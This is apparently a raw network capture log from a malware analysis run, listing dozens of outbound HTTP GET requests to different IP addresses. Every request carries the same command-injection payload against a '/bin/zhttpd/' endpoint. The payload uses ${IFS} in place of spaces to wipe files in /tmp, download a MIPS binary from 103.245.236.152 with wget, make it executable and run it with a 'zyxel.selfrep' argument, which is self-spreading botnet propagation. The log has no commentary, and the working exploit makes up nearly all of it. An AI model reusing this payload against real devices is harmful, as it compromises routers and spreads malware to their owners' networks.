                                          Jan 14, 2024 15:46:33.380213976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8552192.168.2.235734078.54.142.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380227089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8553192.168.2.235578838.234.136.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380253077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8554192.168.2.2344636141.210.238.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380268097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8555192.168.2.2347344161.240.218.230443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380315065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8556192.168.2.2356820209.206.161.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380337000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8557192.168.2.2334856116.127.69.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380363941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8558192.168.2.233397681.233.189.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380363941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8559192.168.2.2354576222.236.43.217443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380400896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8560192.168.2.2355724210.73.119.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380400896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8561192.168.2.2360808186.137.9.157443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380418062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8562192.168.2.2334824222.255.114.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380445957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8563192.168.2.2348734175.138.188.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380507946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8564192.168.2.2355632110.188.2.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380508900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8565192.168.2.2343658161.247.88.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380547047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8566192.168.2.2334648203.232.68.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380585909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8567192.168.2.235818088.210.50.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380589008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8568192.168.2.2341358139.135.97.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380606890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8569192.168.2.2355676194.88.131.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380635023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8570192.168.2.2354012172.48.90.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380670071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8571192.168.2.2355836105.186.166.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380682945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8572192.168.2.2352614108.203.122.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380696058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8573192.168.2.2340824151.88.177.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380748034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8574192.168.2.2344734176.167.192.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380769014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8575192.168.2.235292895.149.90.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380776882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8576192.168.2.234925897.46.239.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380805016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8577192.168.2.2343914147.133.151.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380824089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8578192.168.2.2360462143.15.158.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380867958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8579192.168.2.2356358171.112.167.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380889893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8580192.168.2.2360038101.148.237.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380922079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8581192.168.2.2351796135.107.229.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380953074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8582192.168.2.234889241.66.151.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380965948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8583192.168.2.2355336115.212.138.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380992889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8584192.168.2.233772640.16.47.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381020069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8585192.168.2.2345454180.76.194.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381038904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8586192.168.2.2354682187.39.94.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381062031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8587192.168.2.2333680120.73.228.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381115913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8588192.168.2.2351454172.113.193.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381150007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8589192.168.2.235435893.133.84.28443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381161928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8590192.168.2.2352088157.180.197.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381185055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8591192.168.2.2334802111.233.96.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381222010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8592192.168.2.234847274.46.37.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381232023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8593192.168.2.234204263.184.237.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381252050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8594192.168.2.2341060132.177.127.176443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381287098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8595192.168.2.2356452220.147.74.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381313086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8596192.168.2.2359246106.176.117.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381336927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8597192.168.2.234244070.244.71.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381376982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8598192.168.2.2350722119.137.23.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381418943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8599192.168.2.2335478164.109.45.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381429911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8600192.168.2.2341346146.245.110.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381434917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8601192.168.2.2354186197.165.156.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381459951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8602192.168.2.235419873.138.205.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381494999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8603192.168.2.2340768199.190.81.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381499052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8604192.168.2.2338626201.2.34.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381546021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8605192.168.2.234758094.85.106.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381567001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8606192.168.2.2344646204.23.160.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381597042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8607192.168.2.235595250.6.212.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381617069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8608192.168.2.2356350153.24.224.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381623983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8609192.168.2.2335808216.158.233.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381655931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8610192.168.2.2355088132.222.166.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381685972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8611192.168.2.2350522161.44.81.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381692886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8612192.168.2.2346004198.108.7.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381720066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8613192.168.2.235958265.34.60.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.381736994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8614192.168.2.2345974198.155.3.177443
                                          TimestampBytes transferredDirectionData
